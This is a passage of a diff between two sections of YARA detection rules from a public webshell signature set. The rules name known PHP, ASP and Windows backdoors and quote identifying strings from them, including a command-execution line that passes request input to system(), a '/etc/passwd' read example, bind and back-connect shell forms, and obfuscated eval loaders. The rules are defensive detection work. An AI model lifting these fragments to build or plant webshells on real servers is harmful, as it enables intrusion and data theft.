-		$s16 = "<input type = \"submit\" value = \"Create Exploit\"> <br /> <br />" fullword
+		$s0 = "<!-- PageFSO Below -->"
+		$s1 = "theFile.writeLine(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_NGH
+rule SIGNATURE_BASE_Felikspack3___PHP_Shells_Ssh
 {
 	meta:
-		description = "PHP Webshells Github Archive - file NGH.php"
+		description = "Webshells Auto-generated - file ssh.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "0b971065-df16-5092-beff-c55608447f19"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5914-L5931"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7165-L7176"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c05b5deecfc6de972aa4652cb66da89cfb3e1645"
-		logic_hash = "572b026545b012951136bdb9b1101e38f27bc3321b895799bc853ea1190877f9"
+		hash = "1aa5307790d72941589079989b4f900e"
+		logic_hash = "40c5a5d1d714947454f4aa9f7ed09d777cb60c23933201ac8eaf0d49452af8c6"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<title>Webcommander at <?=$_SERVER[\"HTTP_HOST\"]?></title>" fullword
-		$s2 = "/* Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition :p */" fullword
-		$s5 = "<form action=<?=$script?>?act=bindshell method=POST>" fullword
-		$s9 = "<form action=<?=$script?>?act=backconnect method=POST>" fullword
-		$s11 = "<form action=<?=$script?>?act=mkdir method=POST>" fullword
-		$s16 = "die(\"<font color=#DF0000>Login error</font>\");" fullword
-		$s20 = "<b>Bind /bin/bash at port: </b><input type=text name=port size=8>" fullword
+		$s0 = "eval(gzinflate(str_rot13(base64_decode('"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Matamu
+rule SIGNATURE_BASE_Debug_Bdoor
 {
 	meta:
-		description = "PHP Webshells Github Archive - file matamu.php"
+		description = "Webshells Auto-generated - file BDoor.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "0938efe7-2b6d-5749-af9a-967cca85defb"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5932-L5948"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7177-L7189"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d477aae6bd2f288b578dbf05c1c46b3aaa474733"
-		logic_hash = "c0101dab5fe7c3a2652b2e23e1ef0274364137895a402a0367c6b5474c0e8a1f"
+		hash = "e4e8e31dd44beb9320922c5f49739955"
+		logic_hash = "ed8caeb96a6fc48fe23d5db078bbb8ba5aec3c5d4ee382cbc6bc4e01630f1460"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
-	strings:
-		$s2 = "$command .= ' -F';" fullword
-		$s3 = "/* We try and match a cd command. */" fullword
-		$s4 = "directory... Trust me - it works :-) */" fullword
-		$s5 = "$command .= \" 1> $tmpfile 2>&1; \" ." fullword
-		$s10 = "$new_dir = $regs[1]; // 'cd /something/...'" fullword
-		$s16 = "/* The last / in work_dir were the first charecter." fullword
+	strings:
+		$s1 = "\\BDoor\\"
+		$s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Ru24_Post_Sh
+rule SIGNATURE_BASE_Bin_Client
 {
 	meta:
-		description = "PHP Webshells Github Archive - file ru24_post_sh.php"
+		description = "Webshells Auto-generated - file Client.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "86a45d72-c42d-58d5-9969-d3ebfc22853d"
+		id = "8564d787-5edc-59b0-b1ef-2f33c8a24f82"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5949-L5964"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7190-L7204"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d2c18766a1cd4dda928c12ff7b519578ccec0769"
-		logic_hash = "6cf15a67c311979d32edfb443701cef34ee32d7a672314fc7b60b262b6b2c402"
+		hash = "5f91a5b46d155cacf0cc6673a2a5461b"
+		logic_hash = "28ce9aa136b5d41bb580e6b5b8580d3ccbb7eeec31007e68241d23c5a0f40d40"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "http://www.ru24-team.net" fullword
-		$s4 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a"
-		$s6 = "Ru24PostWebShell"
-		$s7 = "Writed by DreAmeRz" fullword
-		$s9 = "$function=passthru; // system, exec, cmd" fullword
+		$s0 = "Recieved respond from server!!"
+		$s4 = "packet door client"
+		$s5 = "input source port(whatever you want):"
+		$s7 = "Packet sent,waiting for reply..."
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Hiddens_Shell_V1
+rule SIGNATURE_BASE_Zxshell2_0_Rar_Folder_Zxshell
 {
 	meta:
-		description = "PHP Webshells Github Archive - file hiddens shell v1.php"
+		description = "Webshells Auto-generated - file ZXshell.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7194998e-c84c-5f59-92fe-857ecf7e8e88"
+		id = "621ac87e-b1f8-58d7-9328-54af5ca9b605"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5965-L5976"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7205-L7217"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1674bd40eb98b48427c547bf9143aa7fbe2f4a59"
-		logic_hash = "b76400c320e6294b0c831fbbb8e08a9d2097fbb027065f9c4b496d4b005ba016"
+		hash = "246ce44502d2f6002d720d350e26c288"
+		logic_hash = "72eaf90551144eccb7329e0a0e05bcc955ea2bfdb37aa87e9cae7b5f5a26bea0"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U"
+		$s0 = "WPreviewPagesn"
+		$s1 = "DA!OLUTELY N"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_C99_Madnet
+rule SIGNATURE_BASE_Rkntload
 {
 	meta:
-		description = "PHP Webshells Github Archive - file c99_madnet.php"
+		description = "Webshells Auto-generated - file RkNTLoad.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f2b9c3d1-1c55-59cb-a9bf-8b4011f86a3b"
+		id = "fd4b1343-5fa9-5ad8-bee1-6b06b93ddfbe"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5977-L5992"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7218-L7236"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "17613df393d0a99fd5bea18b2d4707f566cff219"
-		logic_hash = "cd4048f28405f106302643656ae5f8a257aaec0184a8057a9dffbda9bb857027"
+		hash = "262317c95ced56224f136ba532b8b34f"
+		logic_hash = "ab767a7016318633055a85195ca2bab08a8c68222d46018aaf8772ab27a373c4"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$md5_pass = \"\"; //If no pass then hash" fullword
-		$s1 = "eval(gzinflate(base64_decode('"
-		$s2 = "$pass = \"pass\";  //Pass" fullword
-		$s3 = "$login = \"user\"; //Login" fullword
-		$s4 = "             //Authentication" fullword
+		$s1 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"
+		$s2 = "5pur+virtu!"
+		$s3 = "ugh spac#n"
+		$s4 = "xcEx3WriL4"
+		$s5 = "runtime error"
+		$s6 = "loseHWait.Sr."
+		$s7 = "essageBoxAw"
+		$s8 = "$Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Reserved. $"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_C99_Locus7S
+rule SIGNATURE_BASE_Binder2_Binder2
 {
 	meta:
-		description = "PHP Webshells Github Archive - file c99_locus7s.php"
+		description = "Webshells Auto-generated - file binder2.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f92fe5a2-e465-56ed-a77b-b32ea4c2c105"
+		id = "29269dc0-f2e4-56ec-ad64-0dff00e339b7"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5993-L6008"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7237-L7253"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d413d4700daed07561c9f95e1468fb80238fbf3c"
-		logic_hash = "5ecfc5f6da471bd3037228c0bc762d50762933af3cf6674210c7b2017a45a646"
+		hash = "d594e90ad23ae0bc0b65b59189c12f11"
+		logic_hash = "fbe56b7d37fc7863fcf55761c0b5b671d661a713ac95f90d65b79eee9a447a9b"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s8 = "$encoded = base64_encode(file_get_contents($d.$f)); " fullword
-		$s9 = "$file = $tmpdir.\"dump_\".getenv(\"SERVER_NAME\").\"_\".$db.\"_\".date(\"d-m-Y"
-		$s10 = "else {$tmp = htmlspecialchars(\"./dump_\".getenv(\"SERVER_NAME\").\"_\".$sq"
-		$s11 = "$c99sh_sourcesurl = \"http://locus7s.com/\"; //Sources-server " fullword
-		$s19 = "$nixpwdperpage = 100; // Get first N lines from /etc/passwd " fullword
+		$s0 = "IsCharAlphaNumericA"
+		$s2 = "WideCharToM"
+		$s4 = "g 5pur+virtu!"
+		$s5 = "\\syslog.en"
+		$s6 = "heap7'7oqk?not="
+		$s8 = "- Kablto in"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Jspwebshell_1_2
+rule SIGNATURE_BASE_Thelast_Orice2
 {
 	meta:
-		description = "PHP Webshells Github Archive - file JspWebshell_1.2.php"
+		description = "Webshells Auto-generated - file orice2.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dfd8c88d-4fe2-5786-9d71-65dba525c358"
+		id = "968cef9e-0163-5f4a-91e3-07510f9f4fcd"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6009-L6025"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7254-L7266"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0bed4a1966117dd872ac9e8dceceb54024a030fa"
-		logic_hash = "13e696c1c671d7fda832c84f150e3f41ed55bf888c4bebfeb06ea68d6be65527"
+		hash = "aa63ffb27bde8d03d00dda04421237ae"
+		logic_hash = "075f3377a9b90c6c1ba74682415b9c0832a839afe647fa6d3c85d4e987618405"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword
-		$s1 = "String password=request.getParameter(\"password\");" fullword
-		$s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java."
-		$s7 = "String editfile=request.getParameter(\"editfile\");" fullword
-		$s8 = "//String tempfilename=request.getParameter(\"file\");" fullword
-		$s12 = "password = (String)session.getAttribute(\"password\");" fullword
+		$s0 = " $aa = $_GET['aa'];"
+		$s1 = "echo $aa;"
 
 	condition:
-		3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Safe0Ver
+rule SIGNATURE_BASE_FSO_S_Sincap
 {
 	meta:
-		description = "PHP Webshells Github Archive - file safe0ver.php"
+		description = "Webshells Auto-generated - file sincap.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a7fc8c89-f7a1-5958-823a-763dedb3066d"
+		id = "fcee20a3-e71b-5f69-ac67-8660fd270703"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6026-L6043"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7267-L7279"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "366639526d92bd38ff7218b8539ac0f154190eb8"
-		logic_hash = "ae5de63b79804cf8c99bc5ea0c8862cf05e4085451d2b516cf95565bf32f3876"
+		hash = "dc5c2c2392b84a1529abd92e98e9aa5b"
+		logic_hash = "705030e93248f5ea6744f78bd7a1816aaa9772880059286b8d686e05b193d4a0"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "$scriptident = \"$scriptTitle By Evilc0der.com\";" fullword
-		$s4 = "while (file_exists(\"$lastdir/newfile$i.txt\"))" fullword
-		$s5 = "else { /* <!-- Then it must be a File... --> */" fullword
-		$s7 = "$contents .= htmlentities( $line ) ;" fullword
-		$s8 = "<br><p><br>Safe Mode ByPAss<p><form method=\"POST\">" fullword
-		$s14 = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword
-		$s20 = "/* <!-- End of Actions --> */" fullword
+		$s0 = "    <font color=\"#E5E5E5\" style=\"font-size: 8pt; font-weight: 700\" face=\"Arial\">"
+		$s4 = "<body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin="
 
 	condition:
-		3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Uploader
+rule SIGNATURE_BASE_Phpshell
 {
 	meta:
-		description = "PHP Webshells Github Archive - file Uploader.php"
+		description = "Webshells Auto-generated - file PhpShell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c68e15d9-865e-5269-a91c-00619fe76305"
+		id = "887264d3-5704-5e38-b0a6-44d529258ea2"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6044-L6055"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7280-L7291"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e216c5863a23fde8a449c31660fd413d77cce0b7"
-		logic_hash = "c4b915f60a952131caa2c4f5bb2eea85ef25f27cabb8ad36a6bb928433558954"
+		hash = "539baa0d39a9cf3c64d65ee7a8738620"
+		logic_hash = "95b3cedac370bf9b06092035a738722f3ec97e6cbafe3d4f742429a865576ad8"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
+		$s2 = "href=\"http://www.gimpster.com/wiki/PhpShell\">www.gimpster.com/wiki/PhpShell</a>."
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Kral
+rule SIGNATURE_BASE_Hytop_Devpack_Config
 {
 	meta:
-		description = "PHP Webshells Github Archive - file kral.php"
+		description = "Webshells Auto-generated - file config.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "da1b8ce1-8b17-53f6-a86b-ad3fe918084e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6056-L6072"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7292-L7305"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4cd1d1a2fd448cecc605970e3a89f3c2e5c80dfc"
-		logic_hash = "0aded226f4e54c0169b9fbda91458f581ea47f9f8bda61a350b5e6f8b60931f3"
+		hash = "b41d0e64e64a685178a3155195921d61"
+		logic_hash = "b2806c30db413bca518943352f233c9d2915356a41eceed5e352b88ee34fbbd3"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$adres=gethostbyname($ip);" fullword
-		$s3 = "curl_setopt($ch,CURLOPT_POSTFIELDS,\"domain=\".$site);" fullword
-		$s4 = "$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";" fullword
-		$s16 = "echo $son.' <br> <font color=\"green\">Access</font><br>';" fullword
-		$s17 = "<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">BLaSTER</a><br /"
-		$s20 = "<p><strong>Server listeleyici</strong><br />" fullword
+		$s0 = "const adminPassword=\""
+		$s2 = "const userPassword=\""
+		$s3 = "const mVersion="
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Cgitelnet
+rule SIGNATURE_BASE_Sendmail
 {
 	meta:
-		description = "PHP Webshells Github Archive - file cgitelnet.php"
+		description = "Webshells Auto-generated - file sendmail.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b02d8549-ebfe-522c-9a6d-8657273da3ed"
+		id = "dd33c2bb-61bf-57b7-82b9-d864097f7a56"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6073-L6087"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7306-L7318"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "72e5f0e4cd438e47b6454de297267770a36cbeb3"
-		logic_hash = "e9b7096d5a19c9d5423bbfe125ae0347853919ab092efa98f0687a5d0cf68953"
+		hash = "75b86f4a21d8adefaf34b3a94629bd17"
+		logic_hash = "bcca9a9380d2695bc277afc9fa72c24cb26ac44c6fbcc87113b017cfe190bdab"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s9 = "# Author Homepage: http://www.rohitab.com/" fullword
-		$s10 = "elsif($Action eq \"command\") # user wants to run a command" fullword
-		$s18 = "# in a command line on Windows NT." fullword
-		$s20 = "print \"Transfered $TargetFileSize Bytes.<br>\";" fullword
+		$s3 = "_NextPyC808"
+		$s6 = "Copyright (C) 2000, Diamond Computer Systems Pty. Ltd. (www.diamondcs.com.au)"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Simple_Backdoor_2
+rule SIGNATURE_BASE_FSO_S_Zehir4
 {
 	meta:
-		description = "PHP Webshells Github Archive - file simple-backdoor.php"
+		description = "Webshells Auto-generated - file zehir4.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "faddd38e-d0c6-5299-9983-53351af1ece5"
+		id = "9f1adcd6-b721-54ef-a20f-c3a353629a40"
 		date = "2025-03-29"
 		modified = "2025-03-29"
-		old_rule_name = "WebShell_simple_backdoor"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6088-L6108"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7319-L7330"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "edcd5157a68fa00723a506ca86d6cbb8884ef512"
-		logic_hash = "655e445e51ec0f1bdce006a72acf3bce95941a349c279c14768760fa9f6f9d76"
+		hash = "5b496a61363d304532bcf52ee21f5d55"
+		logic_hash = "6bcfb1ee40403394bf996ecbe1bb17f9afa0c3ba9e1906881b94bbc785b4a510"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword
-		$s1 = "<!--    http://michaeldaw.org   2006    -->" fullword
-		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
-		$s3 = "        echo \"</pre>\";" fullword
-		$s4 = "        $cmd = ($_REQUEST['cmd']);" fullword
-		$s5 = "        echo \"<pre>\";" fullword
-		$s6 = "if(isset($_REQUEST['cmd'])){" fullword
-		$s7 = "        die;" fullword
-		$s8 = "        system($cmd);" fullword
+		$s5 = " byMesaj "
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Safe_Mode_Bypass_PHP_4_4_2_And_PHP_5_1_2_2
+rule SIGNATURE_BASE_Hkshell_Hkshell
 {
 	meta:
-		description = "PHP Webshells Github Archive - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php"
+		description = "Webshells Auto-generated - file hkshell.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a504442f-85f2-55a1-8a07-1e0faccf8bc0"
+		id = "7436cd7c-7027-56dc-bb62-fac0f70c27d8"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6109-L6123"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7331-L7344"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8fdd4e0e87c044177e9e1c97084eb5b18e2f1c25"
-		logic_hash = "fbe1f77e00fbc4e58cbad564e2d96c0381765ac799dfdf6cc2580428c68f97a5"
+		hash = "168cab58cee59dc4706b3be988312580"
+		logic_hash = "bee4d4c957ede41c771d690d52ac2fd3655238cc1fc106d30fb2721084b38aa1"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword
-		$s3 = "xb5@hotmail.com</FONT></CENTER></B>\");" fullword
-		$s4 = "$v = @ini_get(\"open_basedir\");" fullword
-		$s6 = "by PHP Emperor<xb5@hotmail.com>" fullword
+		$s1 = "PrSessKERNELU"
+		$s2 = "Cur3ntV7sion"
+		$s3 = "Explorer8"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Ntdaddy_V1_9
+rule SIGNATURE_BASE_Imhapftp
 {
 	meta:
-		description = "PHP Webshells Github Archive - file NTDaddy v1.9.php"
+		description = "Webshells Auto-generated - file iMHaPFtp.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a175fd28-5dc2-5827-87f0-4117e889e90e"
+		id = "c810c630-ce08-5059-ad49-f65b244f4d19"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6124-L6138"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7345-L7356"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "79519aa407fff72b7510c6a63c877f2e07d7554b"
-		logic_hash = "fdf8b4bb4980e588ad5ccee2d047660980d39f38617f887c5762dcdb0b858267"
+		hash = "12911b73bc6a5d313b494102abcf5c57"
+		logic_hash = "c24bb80a0ae4284b4303450e9103c5dda30c41b41f323641ac1175461f741ced"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "|     -obzerve : mr_o@ihateclowns.com |" fullword
-		$s6 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword
-		$s13 = "<form action=ntdaddy.asp method=post>" fullword
-		$s17 = "response.write(\"<ERROR: THIS IS NOT A TEXT FILE>\")" fullword
+		$s1 = "echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Lamashell
+rule SIGNATURE_BASE_Unpack_Tback
 {
 	meta:
-		description = "PHP Webshells Github Archive - file lamashell.php"
+		description = "Webshells Auto-generated - file TBack.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "60e39eed-baa2-5999-8560-0a0242ce2608"
+		id = "b5f93621-e1e9-5aed-b574-471b4c1f9570"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6139-L6155"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7357-L7368"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b71181e0d899b2b07bc55aebb27da6706ea1b560"
-		logic_hash = "e58dbd6b9c65a139828890a3fadfad9031580fe189066489d266d37d7078ad98"
+		hash = "a9d1007823bf96fb163ab38726b48464"
+		logic_hash = "0fb43766c305f4235cc0987f411fdc3b3674723687f0b63d346429f4a7b5b87f"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if(($_POST['exe']) == \"Execute\") {" fullword
-		$s8 = "$curcmd = $_POST['king'];" fullword
-		$s16 = "\"http://www.w3.org/TR/html4/loose.dtd\">" fullword
-		$s18 = "<title>lama's'hell v. 3.0</title>" fullword
-		$s19 = "_|_  O    _    O  _|_"
-		$s20 = "$curcmd = \"ls -lah\";" fullword
+		$s5 = "\\final\\new\\lcc\\public.dll"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Simple_PHP_Backdoor_By_DK
+rule SIGNATURE_BASE_Darkspy105
 {
 	meta:
-		description = "PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php"
